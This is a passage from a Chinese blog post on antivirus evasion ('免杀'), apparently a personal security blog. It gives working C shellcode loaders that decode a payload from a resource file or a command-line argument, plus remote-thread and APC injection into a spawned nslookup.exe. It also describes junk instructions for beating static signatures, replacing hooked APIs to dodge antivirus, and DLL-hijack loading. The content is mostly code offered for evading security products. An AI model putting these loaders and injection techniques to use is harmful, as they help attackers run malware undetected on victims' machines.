class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0xa</span>,<span class="number">0xb</span>,<span class="number">0xc</span>,<span class="number">0xd</span>,</span><br><span class="line">    <span class="number">0xe</span>,<span class="number">0xf</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span>&#123;</span><br><span class="line">    HRSRC shellcodeResource = FindResource(<span class="literal">NULL</span>,MAKEINTRESOURCE(IDR_SHELLCODE1),TEXT(<span class="string">&quot;shellcode&quot;</span>));</span><br><span class="line">    DWORD shellcodeSize = SizeofResource(<span class="literal">NULL</span>,shellcodeResource);</span><br><span class="line">    HGLOBAL shellcodeResouceData = LoadResource(<span class="literal">NULL</span>,shellcodeResource);</span><br><span class="line">    <span class="type">char</span>* exec = (<span class="type">char</span>*)VirtualAlloc(<span class="number">0</span>,shellcodeSize,MEM_COMMIT,PAGE_EXECUTE_READWRITE);</span><br><span class="line">    <span class="built_in">memcpy</span>(exec,shellcodeResouceData,shellcodeSize);</span><br><span class="line">    <span class="type">char</span> a;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> i = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">for</span>(;i &lt; shellcodeSize;i++)&#123;</span><br><span class="line">        a = asciitable[(*(exec+i*<span class="number">2</span>))<span class="number">-1</span>]*<span class="number">0x10</span>+asciitable[(*(exec+i*<span class="number">2</span>+<span class="number">1</span>))<span class="number">-1</span>];</span><br><span class="line">        <span class="built_in">memcpy</span>(exec+i,&amp;a,<span class="number">1</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    ((<span class="type">void</span>(*)())exec)();</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="0x05-shellcode分离"><a href="#0x05-shellcode分离" class="headerlink" title="0x05 shellcode分离"></a>0x05 shellcode分离</h2><p>shellcode分离也就是不要直接在硬编码里面存shellcode，而是通过传参的方式或者读取远程文件的方式获取到shellcode，再进行shellcode的执行</p>
<p>shellcode分离的核心思想就是不要把shellcode存在硬编码里面，这样也bypass杀软就对shellcode的检测了</p>
<p>shellcode分离也有局限的地方，比如目标不出网，而我们想钓鱼的话参数又传不进去，这时候怎么把shellcode加载到可执行文件的虚拟4GB内存中呢？</p>
<p>最简单的一个shellcode分离加载</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;Windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;resource.h&quot;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">int</span> asciitable[] = &#123;</span><br><span class="line">    <span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">2</span>,</span><br><span class="line">    <span class="number">3</span>,<span class="number">4</span>,<span class="number">5</span>,<span class="number">6</span>,<span class="number">7</span>,<span class="number">8</span>,<span class="number">9</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0xa</span>,<span class="number">0xb</span>,<span class="number">0xc</span>,<span class="number">0xd</span>,</span><br><span class="line">    <span class="number">0xe</span>,<span class="number">0xf</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc,<span class="type">char</span>* argv[])</span>&#123;</span><br><span class="line">    <span class="type">char</span>* shellcode = argv[<span class="number">1</span>];</span><br><span class="line">    DWORD shellcodeSize = <span class="built_in">strlen</span>(argv[<span class="number">1</span>]);</span><br><span class="line">    <span class="type">char</span>* exec = (<span class="type">char</span>*)VirtualAlloc(<span class="number">0</span>,shellcodeSize,MEM_COMMIT,PAGE_EXECUTE_READWRITE);</span><br><span class="line">    <span class="built_in">memcpy</span>(exec,shellcode,shellcodeSize);</span><br><span class="line">    <span class="type">char</span> a;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> i = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">for</span>(;i &lt; shellcodeSize;i++)&#123;</span><br><span class="line">        a = asciitable[(*(exec+i*<span class="number">2</span>))<span class="number">-1</span>]*<span class="number">0x10</span>+asciitable[(*(exec+i*<span class="number">2</span>+<span class="number">1</span>))<span class="number">-1</span>];</span><br><span class="line">        <span class="built_in">memcpy</span>(exec+i,&amp;a,<span class="number">1</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    ((<span class="type">void</span>(*)())exec)();</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="0x06-远程线程注入"><a href="#0x06-远程线程注入" class="headerlink" title="0x06 远程线程注入"></a>0x06 远程线程注入</h2><p>远程线程注入就是用<code>VirtualAllocEx()</code>函数在另一个进程上开辟一块有可读&#x2F;写&#x2F;执行权限的空间，然后用<code>WriteProcessMemory()</code>函数把shellcode写到开辟的空间里面，最后再用<code>WriteProcessMemory()</code>函数在远程进程中创建一个线程用以执行写进去的 shellcode</p>
<p>实现代码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;Windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">unsigned</span> <span class="type">char</span> buf[] = <span class="string">&quot;&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span>&#123;</span><br><span class="line">    STARTUPINFO lpStartupInfo;</span><br><span class="line">    lpStartupInfo.cb = <span class="keyword">sizeof</span>(STARTUPINFO);</span><br><span class="line">    ZeroMemory(&amp;lpStartupInfo,<span class="keyword">sizeof</span>(STARTUPINFO));</span><br><span class="line">    PROCESS_INFORMATION lpProcessInformation;</span><br><span class="line">    ZeroMemory(&amp;lpProcessInformation,<span class="keyword">sizeof</span>(PROCESS_INFORMATION));</span><br><span class="line">    <span class="keyword">if</span>(!CreateProcess(TEXT(<span class="string">&quot;C:\\Windows\\System32\\nslookup.exe&quot;</span>),<span class="literal">NULL</span>,<span class="literal">NULL</span>,<span class="literal">NULL</span>,FALSE,CREATE_NO_WINDOW,<span class="literal">NULL</span>,<span class="literal">NULL</span>,&amp;lpStartupInfo,&amp;lpProcessInformation))&#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;CreateProcess error...&quot;</span>);</span><br><span class="line">        DWORD ErrorCode = GetLastError();</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;%d&quot;</span>,ErrorCode);</span><br><span class="line">        getchar();</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    LPVOID AllocAddress = VirtualAllocEx(lpProcessInformation.hProcess,<span class="literal">NULL</span>,<span class="keyword">sizeof</span>(buf),MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);</span><br><span class="line">    WriteProcessMemory(lpProcessInformation.hProcess,AllocAddress,buf,<span class="keyword">sizeof</span>(buf),<span class="literal">NULL</span>);</span><br><span class="line">    CreateRemoteThread(lpProcessInformation.hProcess,<span class="literal">NULL</span>,<span class="number">0</span>,(LPTHREAD_START_ROUTINE)AllocAddress,<span class="literal">NULL</span>,<span class="number">0</span>,<span class="number">0</span>);</span><br><span class="line">    system(<span class="string">&quot;pause&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>上面的代码是把 shellcode 注入到自己创建的一个进程里面；实际情况下也可以遍历当前操作系统的所有进程，然后选择一个合适的进程进行注入</p>
<h2 id="0x07-APC注入"><a href="#0x07-APC注入" class="headerlink" title="0x07 APC注入"></a>0x07 APC注入</h2><p>线程在极端的情况下是无法被杀死的，这时候如果想改变一个线程的行为，可以给线程一个函数，让线程自己调用函数，这个函数就是由APC进行指定的</p>
<p>APC注入就是往线程APC队列里面插入一个APC，那么线程就会产生 系统调用&#x2F;异常&#x2F;中断（比如在三环调用SleepEx、SignalObjectAndWait、WaitForSingleObjectEx、WaitForMultipleObjectsEx、MsgWaitForMultipleObjectsEx 函数都可以使线程执行用户APC队列中的函数） 时执行插入的APC指定的函数，可以通过QueueUserAPC函数向一个线程APC队列中插入一个APC，插入到的队列是用户APC队列</p>
<p>实现代码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;Windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">unsigned</span> <span class="type">char</span> buf[] = <span class="string">&quot;&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span>&#123;</span><br><span class="line">    STARTUPINFO lpStartupInfo;</span><br><span class="line">    lpStartupInfo.cb = <span class="keyword">sizeof</span>(STARTUPINFO);</span><br><span class="line">    ZeroMemory(&amp;lpStartupInfo,<span class="keyword">sizeof</span>(STARTUPINFO));</span><br><span class="line">    PROCESS_INFORMATION lpProcessInformation;</span><br><span class="line">    ZeroMemory(&amp;lpProcessInformation,<span class="keyword">sizeof</span>(PROCESS_INFORMATION));</span><br><span class="line">    <span class="keyword">if</span>(!CreateProcess(TEXT(<span class="string">&quot;C:\\Windows\\System32\\nslookup.exe&quot;</span>),<span class="literal">NULL</span>,<span class="literal">NULL</span>,<span class="literal">NULL</span>,FALSE,CREATE_NO_WINDOW,<span class="literal">NULL</span>,<span class="literal">NULL</span>,&amp;lpStartupInfo,&amp;lpProcessInformation))&#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;CreateProcess error...&quot;</span>);</span><br><span class="line">        DWORD ErrorCode = GetLastError();</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;%d&quot;</span>,ErrorCode);</span><br><span class="line">        getchar();</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    LPVOID AllocAddress = VirtualAllocEx(lpProcessInformation.hProcess,<span class="literal">NULL</span>,<span class="keyword">sizeof</span>(buf),MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);</span><br><span class="line">    PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)AllocAddress;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;%x\n&quot;</span>,lpProcessInformation.dwProcessId);</span><br><span class="line">    WriteProcessMemory(lpProcessInformation.hProcess,AllocAddress,buf,<span class="keyword">sizeof</span>(buf),<span class="literal">NULL</span>);</span><br><span class="line">    <span class="keyword">if</span>(!QueueUserAPC((PAPCFUNC)apcRoutine,lpProcessInformation.hThread,<span class="literal">NULL</span>))&#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;QueueUserAPC error...&quot;</span>);</span><br><span class="line">        getchar();</span><br><span class="line">    &#125;</span><br><span class="line">    SleepEx(<span class="number">1000</span>*<span class="number">600</span>,TRUE);</span><br><span class="line">    getchar();</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>QueueUserAPC函数的调用栈是<code>QueueUserAPC-&gt;NtQueueApcThread-&gt;KeInitializeApc(初始化APC结构体)-&gt;KeInsertQueueApc-&gt;KiInsertQueueApc(将APC结构体插入到指定的APC队列中)</code></p>
<p>那么其实不用QueueUserAPC函数也可以，只需要自己初始化一个APC结构体，然后自己插入APC，实现起来麻烦一些，不过效果也更好</p>
<h2 id="0x08-加花指令"><a href="#0x08-加花指令" class="headerlink" title="0x08 加花指令"></a>0x08 加花指令</h2><p>加花指令可以绕过一些杀软的静态检测，比如杀软检测下面一段指令</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mov esi, fs:[<span class="number">0x30</span>]</span><br><span class="line">mov esi, [esi + <span class="number">0xc</span>]</span><br></pre></td></tr></table></figure>

<p>那么只需要在中间加一些花指令即可</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">mov esi, fs:[<span class="number">0x30</span>]</span><br><span class="line">NOP</span><br><span class="line">NOP</span><br><span class="line">NOP</span><br><span class="line">NOP</span><br><span class="line">mov esi, [esi + <span class="number">0xc</span>]</span><br></pre></td></tr></table></figure>

<p>花指令也可以反反汇编，让反汇编器出错，让逆向分析程序者的分析工作大量增加，增大程序被逆向的难度，但是花指令不会影响程序的正常执行；网上的花指令文章很多，自行百度即可</p>
<h2 id="0x09-使用其它API代替敏感API"><a href="#0x09-使用其它API代替敏感API" class="headerlink" title="0x09 使用其它API代替敏感API"></a>0x09 使用其它API代替敏感API</h2><p>一些杀软会通过HOOK技术来检测程序是否使用了敏感API函数如CreateThread等，检测到了就采取一定的预警措施；那么我们可以把敏感API替换为相同功能的API函数，例如CreateThread函数就可以用SetTimer函数去替换；除了 SetTimer 外，LdapUTF8ToUnicode&#x2F;UuidFromStringA等函数也可以在免杀中用到。</p>
<p>更多执行shellcode的方法：<a target="_blank" rel="noopener" href="https://github.com/aahmad097/AlternativeShellcodeExec">https://github.com/aahmad097/AlternativeShellcodeExec</a></p>
<h2 id="0x10-DLL劫持加载shellcode"><a href="#0x10-DLL劫持加载shellcode" class="headerlink" title="0x10 DLL劫持加载shellcode"></a>0x10 DLL劫持加载shellcode</h2><p>在网上瞎逛看到的一篇文章讲的是用DLL劫持来加载 shellcode，而这个方法竟然能过国内某杀软，感觉很怪就记录一下这个思路，具体实现参考后面文章</p>
<h2 id="0x11-参考"><a href="#0x11-参考" class="headerlink" title="0x11 参考"></a>0x11 参考</h2><p><a target="_blank" rel="noopener" href="https://bbs.pediy.com/thread-271207-1.htm#msg_header_h3_8">https://bbs.pediy.com/thread-271207-1.htm#msg_header_h3_8</a><br><a target="_blank" rel="noopener" href="http://t.zoukankan.com/theseventhson-p-13199381.html">http://t.zoukankan.com/theseventhson-p-13199381.html</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/Captain_RB/article/details/123858864">https://blog.csdn.net/Captain_RB&#x2F;article&#x2F;details&#x2F;123858864</a><br><a target="_blank" rel="noopener" href="https://bbs.pediy.com/thread-263668.htm">https://bbs.pediy.com/thread-263668.htm</a></p>

  </div>
</article>

    
<script src="/js/Valine.min.js"></script>

    <div id="vcomments" class="blog-post-comments"></div>
    <script>
        new Valine({
            el: '#vcomments',
            appId: 'XLJfI6ySoXB3RPs2qCDE6Nlh-gzGzoHsz',
            appKey: 'TgxkqpiqcUffwrwbGpafgNBg',
            placeholder: '说点什么呢',
            avatar: 'mp',
            visitor: true,
        })
    </script>


        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/hangchuanin">Projects</a></li>
         
          <li><a href="/categories/">Category</a></li>
         
          <li><a href="/rss2.xml">RSS</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00"><span class="toc-number">1.</span> <span class="toc-text">0x00</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-shellcode%E6%B7%B7%E6%B7%86"><span class="toc-number">2.</span> <span class="toc-text">0x01 shellcode混淆</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-%E5%8E%BB%E9%99%A4%E5%AF%BC%E5%85%A5%E8%A1%A8%E4%B8%AD%E7%9A%84%E6%95%8F%E6%84%9F%E5%87%BD%E6%95%B0%E4%BF%A1%E6%81%AF"><span class="toc-number">3.</span> <span class="toc-text">0x02 去除导入表中的敏感函数信息</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-%E5%8F%8D%E6%B2%99%E7%AE%B1"><span class="toc-number">4.</span> <span class="toc-text">0x03 反沙箱</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#0x030-%E6%A3%80%E6%B5%8B%E7%88%B6%E8%BF%9B%E7%A8%8B%E6%98%AF%E5%90%A6%E4%B8%BAexplore"><span class="toc-number">4.1.</span> <span class="toc-text">0x030 检测父进程是否为explore</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x031-%E6%A3%80%E6%B5%8B%E7%A1%AC%E4%BB%B6%E8%B5%84%E6%BA%90"><span class="toc-number">4.2.</span> <span class="toc-text">0x031 检测硬件资源</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x032-%E6%A3%80%E6%B5%8B%E8%99%9A%E6%8B%9F%E6%9C%BA%E7%89%B9%E5%BE%81%E5%80%BC"><span class="toc-number">4.3.</span> <span class="toc-text">0x032 检测虚拟机特征值</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#0x0320-%E6%A3%80%E6%B5%8B%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8-Device-VBoxGuest%E8%AE%BE%E5%A4%87%E6%96%87%E4%BB%B6"><span class="toc-number">4.3.1.</span> <span class="toc-text">0x0320 检测是否存在\\Device\\VBoxGuest设备文件</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x0321-%E6%A3%80%E6%B5%8B%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8%E8%AE%BE%E5%A4%87%E5%90%8D%E5%8C%85%E5%90%AB-VBOX-%E5%85%B3%E9%94%AE%E5%AD%97%E6%88%96%E8%80%85-VMWARE-%E5%85%B3%E9%94%AE%E5%AD%97"><span class="toc-number">4.3.2.</span> <span class="toc-text">0x0321 检测是否存在设备名包含 VBOX 关键字或者 VMWARE 关键字</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x0322-%E6%A3%80%E6%B5%8B%E8%99%9A%E6%8B%9F%E6%9C%BA%E4%B8%AD%E7%89%B9%E6%9C%89%E7%9A%84%E8%BF%9B%E7%A8%8B"><span class="toc-number">4.3.3.</span> <span class="toc-text">0x0322 检测虚拟机中特有的进程</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x0323-%E6%A3%80%E6%B5%8B%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8%E8%99%9A%E6%8B%9F%E6%9C%BA%E7%89%B9%E6%9C%89%E7%9A%84%E6%B3%A8%E5%86%8C%E8%A1%A8%E9%94%AE%E5%80%BC"><span class="toc-number">4.3.4.</span> <span class="toc-text">0x0323 检测是否存在虚拟机特有的注册表键值</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x0324-%E6%A3%80%E6%B5%8B%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8%E8%99%9A%E6%8B%9F%E6%9C%BA%E7%89%B9%E6%9C%89%E7%9A%84%E6%96%87%E4%BB%B6"><span class="toc-number">4.3.5.</span> <span class="toc-text">0x0324 检测是否存在虚拟机特有的文件</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x033-%E6%A3%80%E6%B5%8B%E7%B3%BB%E7%BB%9F%E7%8E%AF%E5%A2%83%E5%90%AF%E5%8A%A8%E6%97%B6%E9%97%B4"><span class="toc-number">4.4.</span> <span class="toc-text">0x033 检测系统环境启动时间</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x034-%E6%A0%B9%E6%8D%AE%E5%BE%AE%E6%AD%A5%E6%B2%99%E7%AE%B1%E7%89%B9%E5%BE%81%E6%9D%A5%E5%8F%8D%E6%B2%99%E7%AE%B1"><span class="toc-number">4.5.</span> <span class="toc-text">0x034 根据微步沙箱特征来反沙箱</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-%E6%8A%8Ashellcode%E6%94%BE%E5%88%B0%E8%B5%84%E6%BA%90%E6%96%87%E4%BB%B6%E9%87%8C%E9%9D%A2"><span class="toc-number">5.</span> <span class="toc-text">0x04 把shellcode放到资源文件里面</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x05-shellcode%E5%88%86%E7%A6%BB"><span class="toc-number">6.</span> <span class="toc-text">0x05 shellcode分离</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x06-%E8%BF%9C%E7%A8%8B%E7%BA%BF%E7%A8%8B%E6%B3%A8%E5%85%A5"><span class="toc-number">7.</span> <span class="toc-text">0x06 远程线程注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x07-APC%E6%B3%A8%E5%85%A5"><span class="toc-number">8.</span> <span class="toc-text">0x07 APC注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x08-%E5%8A%A0%E8%8A%B1%E6%8C%87%E4%BB%A4"><span class="toc-number">9.</span> <span class="toc-text">0x08 加花指令</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x09-%E4%BD%BF%E7%94%A8%E5%85%B6%E5%AE%83API%E4%BB%A3%E6%9B%BF%E6%95%8F%E6%84%9FAPI"><span class="toc-number">10.</span> <span class="toc-text">0x09 使用其它API代替敏感API</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x10-DLL%E5%8A%AB%E6%8C%81%E5%8A%A0%E8%BD%BDshellcode"><span class="toc-number">11.</span> <span class="toc-text">0x10 DLL劫持加载shellcode</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x11-%E5%8F%82%E8%80%83"><span class="toc-number">12.</span> <span class="toc-text">0x11 参考</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://hangchuanin.github.io/2022/07/17/%E4%B8%80%E4%B8%AA%E8%8F%9C%E9%B8%A1%E7%9A%84%E5%85%8D%E6%9D%80%E4%B9%8B%E8%B7%AF%EF%BC%88%E4%B8%80%EF%BC%89/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://hangchuanin.github.io/2022/07/17/%E4%B8%80%E4%B8%AA%E8%8F%9C%E9%B8%A1%E7%9A%84%E5%85%8D%E6%9D%80%E4%B9%8B%E8%B7%AF%EF%BC%88%E4%B8%80%EF%BC%89/&text=一个菜鸟的免杀之路（一）"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://hangchuanin.github.io/2022/07/17/%E4%B8%80%E4%B8%AA%E8%8F%9C%E9%B8%A1%E7%9A%84%E5%85%8D%E6%9D%80%E4%B9%8B%E8%B7%AF%EF%BC%88%E4%B8%80%EF%BC%89/&title=一个菜鸟的免杀之路（一）"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://hangchuanin.github.io/2022/07/17/%E4%B8%80%E4%B8%AA%E8%8F%9C%E9%B8%A1%E7%9A%84%E5%85%8D%E6%9D%80%E4%B9%8B%E8%B7%AF%EF%BC%88%E4%B8%80%EF%BC%89/&is_video=false&description=一个菜鸟的免杀之路（一）"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
